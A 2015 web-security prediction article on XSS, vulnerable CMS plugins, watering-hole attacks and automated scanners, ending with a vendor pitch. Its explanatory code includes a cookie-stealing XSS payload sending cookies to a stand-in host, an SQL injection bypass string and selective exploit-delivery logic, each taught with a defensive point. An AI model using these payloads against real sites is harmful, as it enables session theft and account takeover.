Four cyber security risks not to be taken for granted in 2015
With Sony the latest victim of hacking, large organisations are witnessing yet again how data breaches cause serious damage, to the tune of millions. The prevalence of hacking in the media raises the question: what’s in store for 2015? writes Ilia Kolochenko
Against a background of more frequent and dangerous XSS attacks, with third-party code and plugins remaining the Achilles’ heel of web applications and chained attacks on the rise, organisations will be looking for new ways to protect their online properties.
Unfortunately, it’s pretty difficult to make information security predictions, and even more difficult to verify them afterwards – we can only judge the effectiveness of information security by the number of public security incidents, as the majority of data breaches remain undetected.
However, here are some web security predictions based on common-sense profitability (the profit-to-cost ratio) for hackers:
1. XSS will become a more frequent and dangerous vector of attacks
It’s very difficult to find high- or critical-risk vulnerabilities in well-known web products (e.g. Joomla, WordPress or SharePoint). However, low- and medium-risk vulnerabilities, such as XSS, will still appear regularly. Sophisticated exploitation of an XSS flaw can yield the same outcome as an SQL injection, so hackers will rely on XSS attacks more and more to achieve their goals.
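To illustrate the class of flaw being described, here is a minimal sketch of a reflected XSS bug and its standard fix, output encoding. The rendering functions and the `evil.example` exfiltration host are hypothetical, used only to show how an unescaped parameter lets injected script read the visitor’s cookies:

```python
import html

def render_comment_vulnerable(comment):
    # Reflecting user input into HTML without encoding: the classic XSS mistake.
    return "<div class='comment'>%s</div>" % comment

def render_comment_safe(comment):
    # Output encoding neutralises the markup in the payload.
    return "<div class='comment'>%s</div>" % html.escape(comment)

# A typical cookie-stealing payload (hypothetical attacker host):
payload = "<script>document.location='//evil.example/?c='+document.cookie</script>"

assert "<script>" in render_comment_vulnerable(payload)   # script would execute
assert "<script>" not in render_comment_safe(payload)     # rendered as inert text
```

In the vulnerable version the browser executes the injected script in the site’s origin, which is why the article treats XSS as comparable in impact to SQL injection.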
Indeed, an XSS flaw on a subdomain puts the entire web application at risk. Many large companies install web application firewalls (WAFs) and regularly conduct penetration testing on their main, most critical website, while ignoring the security of numerous subdomains that they consider “less important” to business continuity. The problem is that in many cases, for the sake of simplicity, usability and compatibility, cookies set on the main website (e.g. www.site.com) will be valid for any subdomain (e.g. education.site.com or jobs.site.com).
This means that an XSS vulnerability on a forgotten subdomain can easily be used to steal cookies from the main website, or from other subdomains (e.g. e-banking.site.com, which also sets cookies for *.site.com), even if they are hosted on completely different servers in different data centres.
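The cookie-scoping rule behind this risk can be sketched in a few lines. The function below implements the domain-matching test from RFC 6265 (§5.1.3): a cookie whose `Domain` attribute is `site.com` is sent to `site.com` and to every subdomain, which is why a compromised subdomain receives the main site’s session cookies. The hostnames are the article’s own illustrative examples:

```python
def cookie_sent_to(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 domain-match: a cookie with Domain=cookie_domain is sent
    to cookie_domain itself and to every one of its subdomains."""
    request_host = request_host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    return (request_host == cookie_domain
            or request_host.endswith("." + cookie_domain))

# A session cookie set by www.site.com with "Domain=site.com" reaches:
assert cookie_sent_to("www.site.com", "site.com")        # the main website
assert cookie_sent_to("education.site.com", "site.com")  # a forgotten subdomain
assert cookie_sent_to("jobs.site.com", "site.com")       # any other subdomain
# ...but not an unrelated host that merely embeds the name:
assert not cookie_sent_to("site.com.evil.example", "site.com")
```

An XSS payload running on education.site.com can therefore read the `document.cookie` value that www.site.com depends on, unless the cookie is scoped narrowly (and flagged `HttpOnly`).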
Quite often, particularly in large companies, different departments maintain their own websites and subdomains for testing purposes. These are not designed to be secure, but their presence endangers the company’s entire web infrastructure. That is to say nothing of cases where a test area sits directly on the main website (e.g. www.site.com/secr3t/beta1/) yet can be found via a Google search.
2. Third-party code and plugins will remain the Achilles’ heel of web applications
While the core code of well-known CMSs and other web products is fairly secure today, third-party code such as plugins and extensions remains vulnerable, even to high-risk flaws. Web developers tend to forget that one outdated plugin, or a third-party website voting script, endangers the entire web application. Obviously, hackers will not miss such opportunities.
For example, WordPress itself may not be vulnerable, but WordPress plugins, which are often produced by new coders with little security experience, may well be. At the same time, plugins are unavoidable: organisations will always want specific customised features on their websites that no CMS can provide by default. Of course, new vulnerabilities (or bypasses of previous patches) in major CMSs are announced from time to time, but they represent a small minority and are usually quite complex to exploit.
A vulnerable plugin means a vulnerable CMS wherever that plugin is installed. By exploiting XSS and SQL injection flaws in plugins, an attacker can obtain the admin password just as if they were exploiting the same vulnerabilities in the core code of the web application.
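A minimal sketch of the kind of plugin flaw being described, using an in-memory SQLite table as a stand-in for the CMS database (the login functions and credentials are hypothetical). The vulnerable version concatenates user input into the SQL statement; the safe version uses a parameterised query:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def login_vulnerable(name, password):
    # Typical flaw in a hastily written plugin: input goes straight
    # into the SQL string.
    query = ("SELECT * FROM users WHERE name = '%s' AND password = '%s'"
             % (name, password))
    return conn.execute(query).fetchone() is not None

def login_safe(name, password):
    # Parameterised query: the driver treats the input as data, not SQL.
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None

payload = "' OR '1'='1"                       # classic injection string
assert login_vulnerable("admin", payload)     # authentication bypassed
assert not login_safe("admin", payload)       # payload rejected
```

The point of the article stands regardless of CMS: it only takes one plugin written like `login_vulnerable` for the whole installation to fall.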
3. Chained attacks via third-party websites will grow
Nowadays, it’s pretty difficult to find a critical vulnerability on a well-known website. It is much quicker, and thus cheaper, for hackers to find several medium-risk vulnerabilities that in combination give complete access to the website. Another trend is to attack a reputable website that the victim visits regularly. For example, when targeting a C-level executive, hackers may compromise several high-profile financial websites or newspapers and insert an exploit pack that activates only for a specific combination of IP address, user agent and authentication cookie belonging to the victim. Such attacks are very difficult to detect, as only the victim ever sees them.
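The selective-delivery logic described above can be sketched as a simple fingerprint filter. Everything here is hypothetical (the documentation-range IP, the cookie name, the user-agent marker); the point is that scanners and ordinary visitors who fail any one check receive the clean page, which is why such implants evade detection:

```python
# Hypothetical victim profile used by a watering-hole implant:
TARGET = {
    "ip": "203.0.113.42",              # documentation-range IP (assumed)
    "user_agent_marker": "Windows NT 6.1",
    "cookie_name": "corp_session",     # cookie only the victim would carry
}

def should_serve_exploit(remote_ip, user_agent, cookies):
    # The payload is served only when every fingerprint matches.
    return (remote_ip == TARGET["ip"]
            and TARGET["user_agent_marker"] in user_agent
            and TARGET["cookie_name"] in cookies)

# The exact victim profile triggers the payload...
assert should_serve_exploit("203.0.113.42",
                            "Mozilla/5.0 (Windows NT 6.1; Win64; x64)",
                            {"corp_session": "abc"})
# ...while a security scanner from another IP sees the unmodified page.
assert not should_serve_exploit("198.51.100.7",
                                "Mozilla/5.0 (Windows NT 6.1; Win64; x64)",
                                {})
```

Because the malicious branch is unreachable for anyone but the victim, automated crawling of the compromised site will report it as clean.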
4. Automated security tools and solutions will no longer be effective
Web application firewalls, web vulnerability scanners and malware detection services will no longer be effective if used in isolation or without human oversight. Both web vulnerabilities and web attacks are becoming ever more sophisticated and harder to detect, and human intervention is almost always necessary to find all the vulnerabilities. It’s not enough to patch 90% or even 99% of them: hackers will find the last vulnerability and use it to compromise the entire website.
The need for human skills was recently demonstrated by a major new analysis (reported by Ars Technica) conducted by researchers at KU Leuven (Belgium) and Stony Brook University (New York). The researchers tested websites “protected” with various trust seals provided by security vendors delivering automated vulnerability and malware scanning services – reputable companies including Symantec, McAfee, Trust-Guard, and Qualys. The research showed “that seal providers perform very poorly when it comes to the detection of vulnerabilities on the websites that they certify.” This is a weakness inherent in almost all fully automated solutions: they can only go so far before their output needs to be analysed by a qualified pentester.
As a solution to these new threats, High-Tech Bridge has launched ImmuniWeb SaaS, a hybrid offering that combines automated security assessment with manual penetration testing.